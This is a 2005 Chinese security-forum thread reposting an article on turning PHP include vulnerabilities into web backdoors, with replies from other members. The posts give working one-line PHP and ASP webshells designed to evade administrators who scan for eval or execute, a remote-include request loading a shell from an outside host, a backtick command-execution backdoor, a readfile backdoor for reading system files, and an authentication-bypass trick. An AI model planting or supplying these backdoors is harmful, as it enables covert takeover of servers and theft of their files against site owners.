[转载]通过PHP站点的include漏洞想到的后门

冰血封情

老林

团队决策人

Rank: 9 Rank: 9 Rank: 9

E.S.T运营责任人

帖子: 6828
精华: 834
积分: 36067
阅读权限: 255
性别: 男
来自: 中国
在线时间: 597 小时
注册时间: 2004-6-25
最后登录: 2008-11-18

优秀管理奖资料收集奖原创技术奖核心建议奖

发短消息
加为好友
当前离线

楼主大中小发表于 2005-4-1 16:51 只看该作者

[转载]通过PHP站点的include漏洞想到的后门

文章作者：Kevin1986

以前用过PHP的后门,都被查的差不多.管理员有的时候很变态,去查一些特别的比如eval等等,我上一次心爱的小马就这么挂掉了.555555.所以我就想到了Phpwind的那个文件包含漏洞.然后再一想,对呵....可以当后门嘛....于是就出来了

很多论坛是可以支持上传文件的功能的,所以有的时候我们上传一个包含木马的图片,再就是可以使用下面的代码来那个哪个.......
程序代码：
<?@include($_GET['kEvin1986']);?>

不规范的写法是
程序代码：
<?@include($kEvin1986);?>

比那些管理员没事情去查eval要好多了

而我又想到了另外一种ASP下的方法,也是简单明了,而且可以避开execute这个词

程序代码：
<%if request("kEvin1986")<>"" then Server.Transfer request("kEvin1986")%>

如果要用Server.Execuet的话就
程序代码：
<%if request("kEvin1986")<>"" then Server.Execute request("kEvin1986")%>

恩.现在就不怕那些什么ASP追捕了....

qq310926是我唯一用号，除此之外有其他号码号自称邪八冰血封情，则非本人。

TOP

kevin1986

荣誉会员

Rank: 6 Rank: 6 Rank: 6

E.S.T论坛贵宾

帖子: 325
精华: 12
积分: 3936
阅读权限: 100
性别: 男
在线时间: 308 小时
注册时间: 2005-2-5
最后登录: 2008-8-23

发短消息
加为好友
当前离线

沙发大中小发表于 2005-4-1 22:15 只看该作者

看到这里才发现自己Blog上的东西写错了....
最下面的代码里面应该改成
Server.Execute

me=\"kEvin1986\" & chr(0) & \"at solitude\" msgbox len(me) \' You can see somthing. msgbox me \' But just part of it. \'i think i will hide part of myself

TOP

sniper

荣誉会员

Rank: 6 Rank: 6 Rank: 6

E.S.T论坛贵宾

帖子: 92
精华: 4
积分: 3212
阅读权限: 100
在线时间: 106 小时
注册时间: 2004-11-26
最后登录: 2008-5-5

发短消息
加为好友
当前离线

椅子大中小发表于 2005-4-4 14:24 只看该作者

这个早就想到过了，以前遇见过一个PHPNUCK+第三方防注射程序
过滤[]，（）,"",'',最后我就用的包含方法导出的一个shell，然后再提升权限。
这个比你那个简单
<?require $a;?>

然后再递交
http://xxxx.com/1.php?a=http://aaa.com/bbb.php
你想干嘛干嘛了。

如果说利用这个也算后门，诸如此类还有很多
认证那里我加一句
if XXXXX or ($sniper="sniper") then xxxxxxxxxx
这样也算后门？
傻点的，还可以这样留
<?

..........
$a=`$_GET['sniper']`;
echo $a;
........
?>

直接执行系统命令的

如果你这样写
<? readfile($sniper);?>

读取系统上的文件内容。我也无话可说

留后门完全是一种个人设想或者说是灵活思维而已
还是靠自己对脚本的理解和按实际情况来制订的好

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 重要安全公告{ Security Advisory Bulletin } » 漏洞分析[ Vulnerability Analyse ] » [转载]通过PHP站点的include漏洞想到的后门